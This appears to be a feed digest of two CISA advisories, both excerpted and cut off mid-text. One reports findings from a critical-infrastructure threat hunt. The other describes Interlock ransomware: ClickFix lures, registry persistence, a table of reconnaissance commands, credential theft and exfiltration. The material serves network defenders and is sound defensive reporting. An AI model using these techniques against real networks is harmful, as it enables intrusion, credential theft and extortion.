CB Alerts http://feed.informer.com/digests/VWPN6WKFZX/feeder CB Alerts Respective post owners and feed distributors Sun, 11 Jan 2015 23:04:06 +0000 Feed Informer http://feed.informer.com/ CISA and USCG Identify Areas for Cyber Hygiene Improvement After Conducting Proactive Threat Hunt at US Critical Infrastructure Organization https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-212a US-CERT Alerts urn:uuid:1dc7376e-74f5-c3e4-31e5-02afb4bba97c Tue, 29 Jul 2025 17:53:52 +0000 <div class="WordSection1"> <h2><strong>Summary</strong></h2> <p><em>The Cybersecurity and Infrastructure Security Agency (CISA) and U.S. Coast Guard (USCG) are issuing this Cybersecurity Advisory to present findings from a recent CISA and USCG hunt engagement. The purpose of this advisory is to highlight identified cybersecurity issues, thereby informing security defenders in other organizations of potential similar issues and encouraging them to take proactive measures to enhance their cybersecurity posture. This advisory has been coordinated with the organization involved in the hunt engagement.</em></p> <p>In 2024, CISA led a proactive hunt engagement at a U.S. critical infrastructure organization with the support of USCG analysts. During hunts, CISA proactively searches for evidence of malicious activity or malicious cyber actor presence on customer networks. The organization invited CISA to conduct a proactive hunt to determine if an actor had been present in the organization’s environment. (<strong>Note:</strong> Henceforth, unless otherwise defined, “CISA” is used in this advisory to refer to the hunt team as an umbrella for both CISA and USCG analysts).</p> <p>During this engagement, CISA did not identify evidence of malicious cyber activity or actor presence on the organization’s network, but did identify cybersecurity risks, including:</p> <ul> <li>Insufficient logging;</li> <li>Insecurely stored credentials;</li> <li>Shared local administrator (admin) credentials across many workstations;</li> <li>Unrestricted remote access for local admin accounts;</li> <li>Insufficient network segmentation configuration between IT and operational technology (OT) assets; and</li> <li>Several device misconfigurations.</li> </ul> <p>In coordination with the organization where the hunt was conducted, CISA and USCG are sharing cybersecurity risk findings and associated mitigations to assist other critical infrastructure organizations with improving their cybersecurity posture. Recommendations are listed for each of CISA’s findings, as well as general practices to strengthen cybersecurity for OT environments. These mitigations align with CISA and the National Institute for Standards and Technology’s (NIST) <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs" title="Cross-Sector Cybersecurity Performance Goals (CPGs)">Cross-Sector Cybersecurity Performance Goals (CPGs)</a>, and with mitigations provided in the USCG Cyber Command’s (CGCYBER) <a href="https://www.uscg.mil/Portals/0/Images/cyber/CGCYBER%202024%20CTIME.pdf?ver=AgbTrQoh4Fs91HUmdhd_xA%3d%3d&amp;timestamp=1747657640065" target="_blank" title="2023 Cyber Trends and Insights in the Marine Environment Report">2024 Cyber Trends and Insights in the Marine Environment (CTIME) Report</a>.</p> </div> <p>Although no malicious activity was identified during this engagement, critical infrastructure organizations are advised to review and implement the mitigations listed in this advisory to prevent potential compromises and better protect our national infrastructure. These mitigations include the following (listed in order of importance):</p> <ul> <li><strong>Do not store passwords or credentials in plaintext.&nbsp;</strong>Instead, <strong>use secure password and credential management solutions&nbsp;</strong>such as encrypted password vaults, managed service accounts, or built-in secure features of deployment tools. <ul> <li><strong>Ensure that all credentials are encrypted&nbsp;</strong>both at rest and in transit. Implement<strong> strict access controls and regular audits&nbsp;</strong>to securely manage scripts or tools accessing credentials.</li> <li>Use code reviews and automated scanning tools to<strong> detect and eliminate any instances of plaintext credentials on hosts or workstations.</strong></li> <li><strong>Enforce the principle of least privilege</strong>, only granting users and processes the access necessary to perform their functions.</li> </ul> </li> <li><strong>Avoid sharing local administrator account credentials.&nbsp;</strong>Instead,<strong> provision unique, complex passwords for each account&nbsp;</strong>using tools like Microsoft’s Local Administrator Password Solution (LAPS) that automate password management and rotation.</li> <li>Enforce <strong>multifactor authentication (MFA) for all administrative access</strong>, including local and domain accounts, and for remote access methods such as Remote Desktop Protocol (RDP) and virtual private network (VPN) connections.</li> <li>Implement and enforce strict policies to only <strong>use hardened bastion hosts isolated from IT networks equipped with phishing-resistant MFA to access industrial control systems (ICS)/OT networks</strong>, and ensure regular workstations (i.e., workstations used for accessing IT networks and applications) cannot be used to access ICS/OT networks.</li> <li><strong>Implement comprehensive (i.e., large coverage) and detailed logging across all systems</strong>, including workstations, servers, network devices, and security appliances. <ul> <li>Ensure logs <strong>capture information such as authentication attempts, command-line executions with arguments, and network connections</strong>.</li> <li><strong>Retain logs for an appropriate period to enable thorough historical analysis</strong> (adhering to organizational policies and compliance requirements) and <strong>aggregate logs in an out-of-band, centralized location</strong>, such as a security information event management (SIEM) tool, to protect them from tampering and facilitate efficient analysis.</li> </ul> </li> </ul> <p>For more detailed mitigations addressing the identified cybersecurity risks, see the&nbsp;<strong>Mitigations&nbsp;</strong>section of this advisory.</p> <h2><strong>Technical Details</strong></h2> <p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v17/matrices/enterprise/" target="_blank" title="MITRE ATT&amp;CK Matrix for Enterprise">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 17. See <strong>Appendix: MITRE ATT&amp;CK Tactics and Techniques</strong> for a table of potential activity mapped to MITRE ATT&amp;CK tactics and techniques.</p> <h3>Overview</h3> <p>Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard (USCG) analysts (collectively referred to as CISA in this report) conducted a threat hunt engagement at a critical infrastructure organization in 2024. During this hunt, CISA proactively searched for evidence of malicious activity or the presence of a malicious cyber actor on the customer’s network using host, network, industrial control system (ICS), and commercial cloud and open-source analysis tools. CISA searched for evidence of activity by looking for specific exploitation tactics, techniques, and procedures (TTPs) and associated artifacts.</p> <p>While CISA did not find evidence of threat actor presence on the organization’s network, the team did identify several cybersecurity risks. These findings are listed below in order of risk. Technical details of each identified cyber risk are included, along with the potential impact from threat actor exploitation of each risk (recommendations for mitigating each risk are listed in the Mitigations<strong>&nbsp;</strong>section below).</p> <p>Several of these findings align with those observed during similar engagements conducted by US Coast Guard Cyber Command (CGCYBER), which are documented in their <a href="https://www.uscg.mil/Portals/0/Images/cyber/CGCYBER%202024%20CTIME.pdf?ver=AgbTrQoh4Fs91HUmdhd_xA%3d%3d&amp;timestamp=1747657640065" target="_blank" title="2024 Cyber Trends and Insights in the Marine Environment (CTIME) Report">2024 Cyber Trends and Insights in the Marine Environment (CTIME)</a> report. The authoring agencies encourage critical infrastructure organizations to review the CTIME report to understand trends in the techniques/attack paths threat actors are using to compromise at-risk organizations, and what mitigations organizations should implement to prevent a successful attack.</p> <h3>Key Findings</h3> <h4><strong>Shared Local Admin Accounts with Non-Unique Passwords Stored as Plaintext</strong></h4> <p><strong>Details:&nbsp;</strong>CISA identified a few local admin accounts with non-unique passwords; these accounts were shared across many hosts. The credentials for each account were stored plaintext in batch scripts. CISA discovered these authorized scripts were configured to create user accounts with local admin privileges and then set identical, non-expiring passwords—these passwords were stored in plaintext in the script. One script was configured to create an admin account (set with a password stored in the script in plaintext) and automatically add to the admin group. The account was set as the local admin account on many other hosts.</p> <p><strong>Potential Impact:&nbsp;</strong>The storage of local admin credentials in plaintext scripts across numerous hosts increases the risk of widespread unauthorized access, and the usage of non-unique passwords facilitates lateral movement throughout the network. Malicious actors with access to workstations with either of these batch scripts could obtain the passwords for these local admin accounts by searching the filesystem for strings like <code>net user /add</code>, identifying scripts containing usernames and passwords [<a href="https://attack.mitre.org/versions/v16/techniques/T1552/001/" target="_blank" title="T1552.001">T1552.001</a>], and accessing these accounts to move laterally.</p> <p>For example, during a controlled security validation exercise (with explicit permission from the customer), CISA used the credentials found in one of the scripts to log into its associated admin account locally on a workstation [<a href="https://attack.mitre.org/versions/v17/techniques/T1078/003/" target="_blank" title="T1078.003">T1078.003</a>], and then establish a Remote Desktop Protocol (RDP) connection to another workstation [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/001/" target="_blank" title="T1021.001">T1021.001</a>]. This demonstrated that the credentials allowed local login to an admin account and enabled lateral movement to any workstation with the account. While using this account, the user had local admin privileges on many workstations. Upon initiating the RDP session, the system issued out a notification that another user was currently logged in and that continuing the session would disconnect the existing user, confirming that the account can be accessed remotely via RDP.</p> <p>The uniform use of local admin accounts with identical, non-expiring passwords across numerous hosts, coupled with the storage of these credentials in plaintext within accessible scripts, elevates the risk of unauthorized access and lateral movement throughout the network.</p> <p>With local admin access, malicious cyber actors can:</p> <ul> <li>Modify existing accounts or create new accounts [<a href="https://attack.mitre.org/versions/v17/techniques/T1098/" target="_blank" title="T1098">T1098</a>], potentially escalating privileges or maintaining persistent access.</li> <li>Install malicious browser extensions on compromised systems [<a href="https://attack.mitre.org/versions/v17/techniques/T1112/" target="_blank" title="T1112">T1112</a>].</li> <li>Communicate with compromised systems using standard application layer protocols [<a href="https://attack.mitre.org/versions/v17/techniques/T1071/" target="_blank" title="T1071">T1071</a>], which may bypass certain security monitoring tools.</li> <li>Modify local policies to escalate privileges or disable security features [<a href="https://attack.mitre.org/versions/v17/techniques/T1484/" target="_blank" title="T1484">T1484</a>].</li> <li>Alter system configurations or install software that executes at startup [<a href="https://attack.mitre.org/versions/v17/techniques/T1547/" target="_blank" title="T1547">T1547</a>], ensuring continued access and persistence.</li> <li>Hijack the execution flow of applications to inject malicious code [<a href="https://attack.mitre.org/versions/v17/techniques/T1574/" target="_blank" title="T1574">T1574</a>].</li> </ul> <p>The widespread distribution of plaintext credentials and the use of identical passwords across hosts increases the risk of unauthorized access throughout the network. This vulnerability heightens the potential for attackers to conduct unauthorized activities, which may impact the confidentiality, integrity, and availability of the organization’s assets.</p> <p><strong>Note:</strong> This finding was associated with workstations only; servers and other devices were not affected.</p> <h4><strong>Insufficient Network Segmentation Configuration Between IT and Operational Technology Environments</strong></h4> <p><strong>Details:</strong> While assessing interconnectivity between the customer’s IT and operational technology (OT) environments, CISA identified that the OT environment was not properly configured. Specifically, standard user accounts could directly access the supervisory control and data acquisition (SCADA) virtual local area network (VLAN) directly from IT hosts.</p> <p>First, CISA determined it was possible to establish a connection via port <code>21</code> from a user workstation in the IT network to a system within the SCADA VLAN. The test established that a network path was available, the remote host was reachable, the port was open and listening for connections, and that the port was directly accessible between the IT and SCADA VLANs, with misconfigured network-level restrictions—for example, firewalls or access control lists (ACLs)—blocking the Transmission Control Protocol (TCP) connection on the port. This test was conducted using a standard user account on a regular IT workstation without administrative privileges [<a href="https://attack.mitre.org/versions/v15/techniques/T1078/" target="_blank" title="T1078">T1078</a>].</p> <p>Second, CISA discovered that the customer did not have sufficient secured bastion hosts dedicated for accessing SCADA and heating, ventilation, and air conditioning (HVAC) systems. A bastion host­—sometimes referred to as a jump box or jump server—is a specialized, highly secured system (often a server or dedicated workstation) that serves as the sole access point between a network segment (such as an internal IT network) and a protected internal network (like an OT or ICS environment). By inspecting and filtering all inbound and outbound traffic, a bastion host is designed to prevent unauthorized access and lateral movement, ensuring that only authenticated and authorized users can interact with internal systems. Though several hosts were designated as bastion hosts for remote access to SCADA and HVAC systems, they lacked the enhanced security configuration, dedicated monitoring, and specialized scrutiny expected of bastion hosts.</p> <p><strong>Potential&nbsp;Impact:&nbsp;</strong>Insufficient OT network segmentation configuration, network access control (NAC), and the ability of a non-privileged user within the IT network to use their credentials to access the critical SCADA VLAN [<a href="https://attack.mitre.org/versions/v17/techniques/T1078/" target="_blank" title="T1078">T1078</a>] presents a security and safety risk. Given that SCADA and HVAC systems control physical processes, compromises of these systems can have real-world consequences, including risks to personnel safety, infrastructure integrity, and equipment functionality.</p> <p>Malicious actors could further exploit potentially unsecured workstations with access to OT systems, and insufficient network segmentation configuration between IT and OT systems, in the following ways:</p> <ul> <li>Use RDP or Secure Shell (SSH) protocols to move laterally from compromised IT workstations to OT systems [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/001/" target="_blank" title="T1021.001">T1021.001</a>] [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/004/" target="_blank" title="T1021.004">T1021.004</a>].</li> <li>Execute commands and scripts using scripting languages like PowerShell to attack OT systems [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/" target="_blank" title="T1059">T1059</a>].</li> <li>Map network connections to identify paths to OT systems [<a href="https://attack.mitre.org/versions/v17/techniques/T1049/" target="_blank" title="T1049">T1049</a>].</li> <li>Gather information about network configurations to plan attacks on OT systems [<a href="https://attack.mitre.org/versions/v17/techniques/T1016/" target="_blank" title="T1016">T1016</a>].</li> </ul> <p>By exploiting these weaknesses, attackers can potentially gain unauthorized access to critical OT systems, manipulate physical processes, disrupt operations, and cause harm.</p> <h4><strong>Insufficient Log Retention and Implementation</strong></h4> <p><strong>Details:</strong> CISA was unable to hunt for every MITRE ATT&amp;CK<sup>®</sup> procedure in the scoped hunt plan partly because the organization’s event logging system was insufficient for this analysis. For example, Windows event logs from workstations were not being forwarded to the organization’s security information event management (SIEM), verbose command line auditing was not enabled (meaning command line arguments were not being captured in Event ID <code>4688</code>), logging in the SIEM was not as comprehensive as required for the analysis, and log retention did not allow for a thorough analysis of historical activity.</p> <p><strong>Potential Impact:&nbsp;</strong>The absence of comprehensive and detailed logs, along with a lack of an established baseline for normal network behavior, prevented CISA from performing thorough behavior and anomaly-based detection. This limitation hindered the ability to hunt for certain TTPs, such as <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques">living-off-the-land techniques,</a> the use of valid accounts [<a href="https://attack.mitre.org/versions/v17/techniques/T1078/" target="_blank" title="T1078">T1078</a>], and other TTPs used by sophisticated threat actors. Such techniques often do not produce discrete indicators of compromise or trigger alerts from antivirus software, intrusion detection systems (IDS), or endpoint detection and response (EDR) solutions. Further, the lack of workstation logs in the organization’s SIEM meant CISA could not analyze authentication events to identify anomalous activities, such as unauthorized access using local administrator credentials. This gap exposes networks to undetected lateral movement and unauthorized access.</p> <p>Insufficient logging can prevent the detection of malicious activity by hindering investigations, which makes detection of threat actors more challenging and leaves the network susceptible to undetected threats.</p> <h3>Additional Findings</h3> <h4><strong>Misconfigured sslFlags on a Production Server</strong></h4> <p><strong>Details:</strong> CISA used PowerShell to examine the <code>ApplicationHost.config</code> file<sup>[</sup><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-212a#_ftnref1" title="Footnote Reference 1"><sup>1</sup></a><sup>]</sup>—a central configuration file for Internet Information Services (IIS) that governs the behavior of the web server and its applications and websites—on a production IIS server. CISA observed an HTTPS binding configured with <code>sslFlags==“0”</code>, which keeps IIS in its legacy “one-certificate-per-IP” mode. This mode disables modern certificate-management features, and because mutual Transport Layer Security (TLS) (client-certificate authentication) must be enabled separately in “SSL Settings” or by adding <code>&lt;access sslFlags=“Ssl, SslRequireCert” /&gt;</code>, the binding leaves the client-certificate enforcement off by default, allowing any TLS client to complete the handshake anonymously. Moreover, <code>sslFlags</code>&nbsp;does not control protocol or cipher selection, so outdated protocols or weak cipher suites (e.g., SSL 3.0, TLS 1.0/1.1) may still be accepted unless Secure Channel (Schannel)<sup>[</sup><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-212a#_ftnref2" title="Footnote Reference 2"><sup>2</sup></a><sup>]</sup> has been explicitly hardened.</p> <p><strong>Potential Impact:&nbsp;</strong>The misconfigured <code>sslFlags</code> could enable threat actors to attempt an adversary-in-the-middle attack [<a href="https://attack.mitre.org/versions/v17/techniques/T1557/" target="_blank" title="T1557">T1557</a>] to intercept credentials and data transmitted between clients and the IIS server. Malicious actors could also exploit vulnerabilities in older Secure Sockets Layer (SSL)/TLS protocols, as well as weak cipher suites, increasing the risk for protocol downgrade attacks in which an attacker forces the server and client to negotiate the use of weaker encryption standards [<a href="https://attack.mitre.org/versions/v17/techniques/T1562/010/" target="_blank" title="T1562.010">T1562.010</a>]. This compromises the confidentiality and integrity of data transmitted over this channel. Furthermore, the absence of client certificate enforcement meant the server did not validate the identity of the connecting clients beyond the basic SSL/TLS handshake. This deficiency exposed the server to risks where unauthorized or malicious clients could impersonate legitimate users, potentially gaining access to sensitive resources without proper verification.</p> <h4><strong>Misconfigured Structured Query Language Connections on a Production Server</ #StopRansomware: Interlock https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a US-CERT Alerts urn:uuid:92f7ba3c-49d4-8ac4-ea30-1380a478f905 Mon, 21 Jul 2025 14:11:24 +0000 <h2><strong>Summary</strong></h2> <p><em><strong>Note</strong>: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit </em><a href="/stopransomware/stopransomware" target="_blank" data-entity-type="node" data-entity-uuid="1a82f9f0-31f8-4dfb-954e-45118ea9cdf0" data-entity-substitution="canonical" title="#StopRansomware"><em>stopransomware.gov</em></a><em> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p> <p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC)—hereafter referred to as “the authoring organizations”—are releasing this joint advisory to disseminate known Interlock ransomware IOCs and TTPs identified through FBI investigations (as recently as June 2025) and trusted third-party reporting.</p> <p>The Interlock ransomware variant was first observed in late September 2024, targeting various business, critical infrastructure, and other organizations in North America and Europe. FBI maintains these actors target their victims based on opportunity, and their activity is financially motivated. FBI is aware of Interlock ransomware encryptors designed for both Windows and Linux operating systems; these encryptors have been observed encrypting virtual machines (VMs) across both operating systems. FBI observed actors obtaining initial access via drive-by download from compromised legitimate websites, which is an uncommon method among ransomware groups. Actors were also observed using the ClickFix social engineering technique for initial access, in which victims are tricked into executing a malicious payload under the guise of fixing an issue on the victim’s system. Actors then use various methods for discovery, credential access, and lateral movement to spread to other systems on the network.</p> <p>Interlock actors employ a double extortion model in which actors encrypt systems after exfiltrating data, which increases pressure on victims to pay the ransom to both get their data decrypted and prevent it from being leaked.&nbsp;</p> <p>FBI, CISA, HHS, and MS-ISAC encourage organizations to implement the recommendations in the <strong>Mitigations</strong> section of this advisory to reduce the likelihood and impact of Interlock ransomware incidents.</p> <h2><a class="ck-anchor" id="technical-details"><strong>Technical Details</strong></a></h2> <p><strong>Note</strong>: This advisory uses the <a href="https://attack.mitre.org/versions/v17/matrices/enterprise/" target="_blank" title="MITRE ATT&amp;CK Matrix for Enterprises">MITRE ATT&amp;CK® Matrix for Enterprise</a> framework, version 17. See the <strong>MITRE ATT&amp;CK Tactics and Techniques</strong> section of this advisory for tables mapped to the threat actors’ activity.</p> <h3><a class="ck-anchor" id="overview">Overview</a></h3> <p>Since September 2024, Interlock ransomware actors have impacted a wide range of businesses and critical infrastructure sectors in North America and Europe. These actors are opportunistic and financially motivated in nature and employ tactics to infiltrate and disrupt the victim’s ability to provide their essential services.&nbsp;</p> <p>Interlock actors leverage a double extortion model, in which they both encrypt and exfiltrate victim data. Ransom notes do not include an initial ransom demand or payment instructions; instead, victims are provided with a unique code and are instructed to contact the ransomware group via a <code>.onion</code> URL through the Tor browser. To date, Interlock actors have been observed encrypting VMs, leaving hosts, workstations, and physical servers unaffected; however, this does not mean they will not expand to these systems in the future. To counter Interlock actors’ threat to VMs, enterprise defenders should implement robust endpoint detection and response (EDR) tooling and capabilities.</p> <p>The authoring agencies are aware of emerging open-source reporting detailing similarities between the Rhysida and Interlock ransomware variants.<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note1"><sup>1</sup></a> For additional information on Rhysida ransomware, see the joint advisory, <a href="/news-events/cybersecurity-advisories/aa23-319a" data-entity-type="node" data-entity-uuid="51680afc-659a-4ce5-8354-5f778b425c80" data-entity-substitution="canonical" title="#StopRansomware: Rhysida Ransomware">#StopRansomware: Rhy</a><a href="/news-events/cybersecurity-advisories/aa23-319a#StopRansomware:" data-entity-type="node" data-entity-uuid="51680afc-659a-4ce5-8354-5f778b425c80" data-entity-substitution="canonical" title="#StopRansomware: Rhysida Ransomware">sida Ransomware</a><a href="#StopRansomware:">.</a></p> <h3><a class="ck-anchor" id="initial-access">Initial Access</a></h3> <p>FBI has observed Interlock actors obtaining initial access [<a href="https://attack.mitre.org/versions/v17/tactics/TA0001/" target="_blank">TA0001</a>] via drive-by download [<a href="https://attack.mitre.org/versions/v17/techniques/T1189/" target="_blank">T1189</a>] from compromised legitimate websites, an atypical method for ransomware actors. Interlock ransomware methods for initial access have previously disguised malicious payloads as fake Google Chrome or Microsoft Edge browser updates, though a cybersecurity company recently reported a shift to payload filenames masquerading as updates for common security software (see Table 5 for a list of filenames).<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note2"><sup>2</sup></a></p> <p>In some instances, FBI has observed Interlock actors using the ClickFix social engineering technique, in which unsuspecting users are prompted to execute a malicious payload by clicking a fake Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) [<a href="https://attack.mitre.org/versions/v17/techniques/T1189/" target="_blank">T1189</a>]. The CAPTCHA contains instructions for users to open the Windows Run window, paste the clipboard contents, and then execute a malicious Base64-encoded PowerShell process [<a href="https://attack.mitre.org/versions/v17/techniques/T1204/004/" target="_blank">T1204.004</a>].<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note3"><sup>3</sup></a></p> <p><strong>Note</strong>: This ClickFix technique has been used in several other malware campaigns, including Lumma Stealer and DarkGate.<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note4"><sup>4</sup></a></p> <h3><a class="ck-anchor" id="execution-and-persistence">Execution and Persistence</a></h3> <p>Based on FBI investigations, the fake Google Chrome browser executable functions as a remote access trojan (RAT) [<a href="https://attack.mitre.org/versions/v17/techniques/T1105/" target="_blank">T1105</a>] designed to execute a PowerShell script [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/001/" target="_blank">T1059.001</a>] that drops a file into the Windows Startup folder. From there, the file is designed to run the RAT every time the victim logs in [<a href="https://attack.mitre.org/versions/v17/techniques/T1547/001/" target="_blank">T1547.001</a>], establishing persistence [<a href="https://attack.mitre.org/versions/v17/tactics/TA0003/" target="_blank">TA0003</a>].&nbsp;</p> <p>FBI also observed instances in which Interlock actors executed a PowerShell command designed to establish persistence via a Windows Registry key modification [<a href="https://attack.mitre.org/versions/v17/techniques/T1547/001/" target="_blank">T1547.001</a>]. To do so, Interlock actors used a PowerShell command [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/001/" target="_blank">T1059.001</a>] designed to add a run key value named “Chrome Updater” [<a href="https://attack.mitre.org/versions/v17/techniques/T1036/005/" target="_blank">T1036.005</a>] that uses a specific log file as an argument upon user login.</p> <h3><a class="ck-anchor" id="reconnaissance">Reconnaissance</a></h3> <p>To facilitate reconnaissance, a PowerShell script executes a series of commands [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/001/" target="_blank">T1059.001</a>] designed to gather information on victim machines (see <strong>Table 1</strong>).</p> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption>Table 1. PowerShell Commands for Reconnaissance</caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">PowerShell Command</th> <th role="columnheader">Description</th> </tr> </thead> <tbody> <tr> <td>WindowsIdentity.GetCurrent()</td> <td>Returns a WindowsIdentity object that represents the current Windows user [<a href="https://attack.mitre.org/versions/v17/techniques/T1033/" target="_blank">T1033</a>].</td> </tr> <tr> <td>systeminfo</td> <td>Displays detailed configuration information [<a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank">T1082</a>] about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties.</td> </tr> <tr> <td>tasklist/svc</td> <td>Lists unabridged service information [<a href="https://attack.mitre.org/versions/v17/techniques/T1007/" target="_blank">T1007</a>] for each process currently running on the local computer.</td> </tr> <tr> <td>Get-Service</td> <td>Gets objects that represent the services [<a href="https://attack.mitre.org/versions/v17/techniques/T1007/" target="_blank">T1007</a>] on a computer, including running and stopped services.</td> </tr> <tr> <td>Get-PSDrive</td> <td> <p>Gets the drives [<a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank">T1082</a>] in the current session, such as:</p> <ul> <li>Windows logical drives on the computer, including drives mapped to network shares.</li> <li>Drives exposed by PowerShell providers.</li> <li>Session-specified temporary drives and persistent mapped network drives.<br>&nbsp;</li> </ul> </td> </tr> <tr> <td>arp -a</td> <td>Displays and modifies entries in the Address Resolution Protocol (ARP) cache table [<a href="https://attack.mitre.org/versions/v17/techniques/T1016/" target="_blank">T1016</a>], which contains entries on the IPv4 and IPv6 addresses on host endpoints.</td> </tr> </tbody> </table> <h3><a class="ck-anchor" id="command-and-control">Command and Control</a></h3> <p>FBI observed Interlock actors using command and control (C2) [<a href="https://attack.mitre.org/versions/v17/tactics/TA0011/" target="_blank">TA0011</a>] applications like <a href="https://attack.mitre.org/versions/v17/software/S0154/" target="_blank">Cobalt Strike</a> and SystemBC. Interlock actors also used Interlock RAT<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note5"><sup>5</sup></a> and NodeSnake RAT (as of March 2025)<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note6"><sup>6</sup></a> for C2 and executing commands.</p> <h3><a class="ck-anchor" id="credential-access">Credential Access, Lateral Movement, and Privilege Escalation</a></h3> <p>FBI observed that once Interlock actors establish remote control of a compromised system, they use a series of PowerShell commands to download a credential stealer (<code>cht.exe</code>) [<a href="https://attack.mitre.org/versions/v17/tactics/TA0006/" target="_blank">TA0006</a>] and keylogger binary (<code>klg.dll</code>) [<a href="https://attack.mitre.org/versions/v17/techniques/T1056/001/" target="_blank">T1056.001</a>],[<a href="https://attack.mitre.org/versions/v17/techniques/T1105/" target="_blank">T1105</a>]. According to open source reporting, the credential stealer collects login information and associated URLs for victims’ online accounts [<a href="https://attack.mitre.org/versions/v17/techniques/T1555/003/" target="_blank">T1555.003</a>], while the keylogger dynamic link library (DLL) logs users’ keystrokes in a file named <code>conhost.txt</code> [<a href="https://attack.mitre.org/versions/v17/techniques/T1036/005/" target="_blank">T1036.005</a>].<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note7"><sup>7</sup></a> As of February 2025, private cybersecurity analysts also observed Interlock ransomware infections executing different versions of information stealers [<a href="https://attack.mitre.org/versions/v17/tactics/TA0006/" target="_blank">TA0006</a>], including Lumma Stealer<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note8"><sup>8</sup></a> and Berserk Stealer, to harvest credentials for lateral movement and privilege escalation [<a href="https://attack.mitre.org/versions/v17/techniques/T1078/" target="_blank">T1078</a>].<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note9"><sup>9</sup></a></p> <p>Interlock actors leverage compromised credentials and Remote Desktop Protocol (RDP)<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note10"><sup>10</sup></a> [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/001/" target="_blank">T1021.001</a>] to move between systems. They also use tools like AnyDesk to enable remote connectivity and PuTTY to assist with lateral movement [<a href="https://attack.mitre.org/versions/v17/techniques/T1219/" target="_blank">T1219</a>].<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note11"><sup>11</sup></a> In addition to stealing users’ online credentials, Interlock actors have compromised domain administrator accounts (possibly by using a Kerberoasting attack [<a href="https://attack.mitre.org/versions/v17/techniques/T1558/003/" target="_blank">T1558.003</a>])<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note12"><sup>12</sup></a> to gain additional privileges [<a href="https://attack.mitre.org/versions/v17/techniques/T1078/002/" target="_blank">T1078.002</a>].&nbsp;</p> <h3><a class="ck-anchor" id="collection-and-exfiltration">Collection and Exfiltration</a></h3> <p>Interlock actors leverage Azure Storage Explorer (<code>StorageExplorer.exe</code>) to navigate victims’ Microsoft Azure Storage accounts [<a href="https://attack.mitre.org/versions/v17/techniques/T1530/" target="_blank">T1530</a>] prior to exfiltrating data. According to open source reporting, Interlock actors execute AzCopy to exfiltrate data by uploading it to the Azure storage blob [<a href="https://attack.mitre.org/versions/v17/techniques/T1567/002/" target="_blank">T1567.002</a>].<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note13"><sup>13</sup></a> Interlock actors also exfiltrate data over file transfer tools, including WinSCP [<a href="https://attack.mitre.org/versions/v17/techniques/T1048/" target="_blank">T1048</a>].</p> <h3><a class="ck-anchor" id="impact">Impact</a></h3> <p>Following data exfiltration, Interlock actors deploy the encryption binary as a 64-bit executable named <code>conhost.exe</code> [<a href="https://attack.mitre.org/versions/v17/techniques/T1486/" target="_blank">T1486</a>],[<a href="https://attack.mitre.org/versions/v17/techniques/T1036/005/" target="_blank">T1036.005</a>]. FBI has observed Interlock ransomware encryptors for both Windows and Linux operating systems. Encryptors are designed to encrypt files using a combined Advanced Encryption Standard (AES) and Rivest-Shamir-Adleman (RSA) algorithm. In addition, cybersecurity researchers have identified Interlock ransomware samples using a FreeBSD ELF encryptor [<a href="https://attack.mitre.org/versions/v17/techniques/T1486/" target="_blank">T1486</a>], a departure from usual Linux encryptors designed for VMware ESXi servers and VMs.<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note14"><sup>14</sup></a></p> <p>A cybersecurity company identified a DLL binary named <code>tmp41.wasd</code>—executed after encryption using <code>rundll32.exe</code> [<a href="https://attack.mitre.org/versions/v17/techniques/T1218/011/" target="_blank">T1218.011</a>]—which uses the <code>remove()</code> function to delete the encryption binary [<a href="https://attack.mitre.org/versions/v17/techniques/T1070/004/" target="_blank">T1070.004</a>];<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note15"><sup>15</sup></a> on Linux machines, the encryptor uses a similar technique to execute the <code>removeme</code> function.&nbsp;</p> <p>Encrypted files are appended with either <code>a .interlock</code> or <code>.1nt3rlock</code> file extension, alongside a ransom note titled <code>!__README__!.txt</code> delivered via group policy object (GPO). Interlock actors use a 